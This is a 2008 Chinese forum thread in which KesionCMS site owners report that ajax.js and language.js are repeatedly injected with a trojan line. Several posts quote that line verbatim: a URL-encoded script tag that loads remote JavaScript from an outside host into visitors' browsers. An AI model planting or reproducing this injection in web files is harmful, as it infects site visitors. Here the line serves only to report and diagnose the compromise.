账号通
    

账号  

密码  

5502

查看

13

回复
主题:又有新的漏洞?language.js和ajax.js又被注入代码 [收藏主题] 转到:  
miforum 当前离线

466

主题

0

广播

0

粉丝
添加关注
级别:四年级

用户积分:5808 分
登录次数:456 次
注册时间:2006/12/2
最后登录:2012/11/1
miforum 发表于:2008/5/14 17:36:00   | 只看该作者 查看该作者主题 楼主 
科汛在线考试系统(NET)

补丁已经打到5.4的那个了。

先是Ks_Inc/ajax.js被注入如下代码:

document.writeln("<script src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73><\/script>");

删掉ajax.js后,

Ks_Inc/language.js又被加入同样的代码:

document.writeln("<script src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%

73><\/script>");

 

 

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
bxdcr 当前离线

311

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:3211 分
登录次数:231 次
注册时间:2007/9/28
最后登录:2017/8/26
bxdcr 发表于:2008/6/24 8:45:00   | 只看该作者 查看该作者主题 沙发 
科汛在线商城系统(NET)

 

我今天才发现!

 

sp3同样被挂了!

 

郁闷

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
mt56 当前离线

4985

主题

53

广播

17

粉丝
添加关注
级别:版主

用户积分:23430 分
登录次数:1621 次
注册时间:2007/2/10
最后登录:2022/9/28
mt56 发表于:2008/6/9 22:43:00   | 只看该作者 查看该作者主题 藤椅 
科汛在线商城系统(NET)

请检查服务器的安全吧。

我们的用了很久,都没有问题。

不过官方也要自己纠查一下!

安全第一!

稳定第一!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
sz505202252 当前离线

2

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:222 分
登录次数:1 次
注册时间:2008/6/9
最后登录:2008/6/9
sz505202252 发表于:2008/6/9 22:36:00   | 只看该作者 查看该作者主题 板凳 
做在线知识付费 选科汛云开店

我都快疯了

我的也一样

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
51down 当前离线

66

主题

6

广播

0

粉丝
添加关注
级别:学前班

用户积分:751 分
登录次数:36 次
注册时间:2008/2/18
最后登录:2017/9/29
51down 发表于:2008/6/24 8:58:00   | 只看该作者 查看该作者主题 报纸 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
wancn 当前离线

315

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:3644 分
登录次数:448 次
注册时间:2007/9/19
最后登录:2012/12/5
wancn 发表于:2008/6/4 9:28:00   | 只看该作者 查看该作者主题 地板 
科汛在线考试系统(NET)
唉。天天这样挂。累!!!
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
diyu1123 当前离线

81

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:888 分
登录次数:68 次
注册时间:2006/11/19
最后登录:2009/5/31
diyu1123 发表于:2008/6/4 9:25:00   | 只看该作者 查看该作者主题 7楼 
科汛在线商城系统(NET)
丫的 老子已经被这SB挂的马整烦死了
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
miforum 当前离线

466

主题

0

广播

0

粉丝
添加关注
级别:四年级

用户积分:5808 分
登录次数:456 次
注册时间:2006/12/2
最后登录:2012/11/1
miforum 发表于:2008/6/3 19:31:00   | 只看该作者 查看该作者主题 8楼 
科汛在线商城系统(NET)

哈哈,惨!

把一些程序目录设置为只读。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
无心石 当前离线

43

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:805 分
登录次数:35 次
注册时间:2008/2/23
最后登录:2009/4/14
无心石 发表于:2008/6/3 19:27:00   | 只看该作者 查看该作者主题 9楼 
科汛在线网校系统
我让管理员把空间的文件彻底删干净了.用全新升级后的sp3上传,今天又被挂马.崩溃中....
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
wancn 当前离线

315

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:3644 分
登录次数:448 次
注册时间:2007/9/19
最后登录:2012/12/5
wancn 发表于:2008/6/3 17:24:00   | 只看该作者 查看该作者主题 10楼 

我是反反复复的被挂了这个木马.和大家遇到的情况一模一样.

没删几分钟就又来了.

我已经没招了.

百度一下,http://www.baidu.com/s?wd=%3Cscript+src%3Dhttp%3A%2F%2F%2561%252E%2538%2565%2539%252E%256E%2565%2574%2F%2531%252E%256A%2573%3E%3C%2Fscript%3E

全是科讯用户被挂的这个木马.看来这个木马就是针对咱科讯用户的.希望官方重视.

 

 

就是这段代码

<script src=http://%61%2E%38%65%39%2E%6E%65%74/%31%2E%6A%73></script>

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.21875秒 powered by KesionCMS 9.0